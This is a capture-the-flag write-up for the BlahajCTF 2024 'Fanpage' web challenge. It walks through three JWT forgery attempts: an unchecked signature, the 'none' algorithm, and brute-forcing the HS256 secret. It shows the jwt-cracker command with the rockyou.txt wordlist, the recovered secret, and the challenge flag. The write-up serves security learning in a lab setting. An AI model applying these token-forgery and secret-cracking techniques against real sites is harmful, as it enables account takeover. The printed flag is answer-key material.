BlahajCTF 2024 | Fanpage

Published on: February 6, 2025

3 min read · Posted by Baba is Dead

Challenge Details

Description

Category

Web Exploitation

Difficulty

Easy

Topics

Competition

BlahajCTF 2024

Author

Baba is Dead

Check out my new fanpage for Blahaj!

Writeup

About the Challenge

This is a JWT challenge about gaining admin access through changing the JWT token. We are greeted with a simple home page, with an admin panel. There's nothing worth noting about the home page.

fanpage

Visiting the admin page, we see that we are being rejected as we are not the admin user.

admin page

Since verification is involved, cookies are most likely being used to verify the identity of the user. We can inspect the cookies to find a cookie called token:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNzMyNjQyMDY5fQ.elYdjQKmr2uxC6r7EGLwat0939yIGiOiFN8pisioFwg

This is a JWT Token, as there are two dots separating the three chunks of data: the header, payload, and signature. We can use a website like jwt.io or simply use Burp Suite's JSON Web Token Extension to decode the token:

// Header
{
  "alg": "HS256",
  "typ": "JWT"
}

// Payload
{
  "username": "guest",
  "exp": 1732642069
}

Solve Process

Blind JWT token spoofing is usually limited to the following (for simple challenges):

  1. Invalid/No Signature Checks
  2. None Type Headers
  3. JWT Secret Bruting

Invalid/No Signature Checks

We can test this by using Burp Suite to modify the payload and giving it a random key to generate the signature. JWT works by using a secret password (JWT Secret) and parsing it with the payload to form a signature.

However, if the backend does not check whether a signature is valid or not, we will be able to change our payload to whatever we want.

We can take a guess that the username should be admin. When we do this, we are greeted by this screen:

<h1>You are STILL not the admin! Go away hacker!!!</h1>

None Type Headers

Some vulnerable applications will not check the signature if we set the header algorithm to None. We can once again use Burp Suite to test this vulnerability:

fanpage3

This returns the same error and does not work.

JWT Secret Bruting

Lastly, we can try brute-force guessing the JWT secret used in the signing of the signature. If the secret chosen was a common one, then we would easily be able to find the key and thus sign our own payloads.

You can use a variety of tools to do this. I used jwt-cracker. You will also need a wordlist, which will be our guesses for the JWT secret. The most common wordlist used is rockyou.txt. This is my command (assuming rockyou.txt is in the same directory):

jwt-cracker -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNzMyNjQyMDY5fQ.elYdjQKmr2uxC6r7EGLwat0939yIGiOiFN8pisioFwg -d rockyou.txt

Running this, we will get our JWT Secret to be i-love-shark. We can now use this to sign our JWT token to set the username to admin.

Flag

blahaj{Jwt_BrUt3f0Rc3_9291}

Resources

Please login to comment

Comments

No comments yet